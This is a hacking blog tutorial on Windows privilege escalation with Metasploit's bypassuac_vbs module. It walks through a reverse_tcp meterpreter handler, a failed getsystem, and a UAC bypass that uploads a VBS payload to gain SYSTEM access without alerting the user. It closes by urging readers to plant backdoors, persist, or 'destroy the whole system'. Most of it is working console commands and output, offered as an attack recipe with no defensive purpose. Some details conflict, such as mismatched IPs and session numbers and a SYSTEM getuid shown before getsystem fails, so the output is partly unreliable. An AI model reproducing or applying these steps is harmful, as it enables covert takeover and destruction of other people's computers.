windows privilege escalation using “bypassuac vbs” metasploit
Hacking any windows system is an easy process with metasploit. We can use many techniques to compromise windows by either exploiting a remote code execution or malicious file attack. Code is often embedded with genuine applications or executed remotely on an application with limited privileges. When we use getsystem command it will return an error “access denied”.
To get system level or admin privilege we have to execute it as admin which is monitored my windows UAC. It can check for verified publisher and certificate info. Asking for admin privilege in a malicious executable is a bad practice. A malicious file asking for privileges can alert the user whereas a code without admin privilege can run in background without causing much distraction.
In metasploit we have plenty of exploits to escalate privilege of an existing meterpreter session. Here we are using bypassuac_vbs exploit to escalate meterpreter privilege. This exploit can bypass UAC in background without asking confirmation. We have other exploits like bypassuac and bypassuac_injection but they can alert the user.
Demo Video
Requirements
You need an updated version of metasploit msf5 is used in this tutorial. This exploit is for a previously compromised system i.e we already need a meterpreter session running in the background. check my blog on How to hack windows 10 using kali linux remotely with metasploit 2016 if you don’t know how to compromise any windows system (win 10/8/8.1/7/vista/xp).
+ — –=[ 1518 exploits – 875 auxiliary – 257 post ]
+ — –=[ 437 payloads – 37 encoders – 8 nops ]
+ — –=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.102
lhost => 192.168.1.103
msf exploit(handler) > set lport 444
lport => 444
msf exploit(handler) > exploit[*] Started reverse TCP handler on 192.168.1.103:444
[*] Starting the payload handler…
[*] Sending stage (957487 bytes) to 192.168.1.111
[*] Meterpreter session 2 opened (192.168.1.103:444 -> 192.168.1.111:54387) at 2016-07-17 06:08:32 -0400meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : USER-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter >
As you can see getsystem command didn’t work. Now background the session using the command below
[*] Backgrounding session 1…
bypassuac exploit
Once you have got a session, background it in metasploit handler and change the module to bypassuac_vbs.
Set the session id
session => 1
Exploit the target, a new meterpreter session will be spawned
[+] Windows 7 (Build 7601, Service Pack 1). may be vulnerable.
[*] UAC is Enabled, checking level…
[+] Part of Administrators group! Continuing…
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing…
[*] Uploading the Payload VBS to the filesystem…
[*] Sending stage (957487 bytes) to 192.168.1.111
[*] Meterpreter session 3 opened (192.168.1.103:4444 -> 192.168.1.111:54471) at 2016-07-17 06:12:47 -0400
[+] Deleted C:\Users\user\AppData\Local\Temp\ZPqcIxHe.vbs
meterpreter >
the new meterpreter session will run with escalated privileges, try getsystem command to check privileges. Once you got the system you are the admin/owner of that pc
…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
Now you can access to system files and create multiple backdoors or persist the session in system directory or you can simply destroy the whole system
Any doubts or questions? post it on the comment section below. If you like this blog give me a like on facebook and add me on google plus. Subscribe my youtube channel for video tutorials.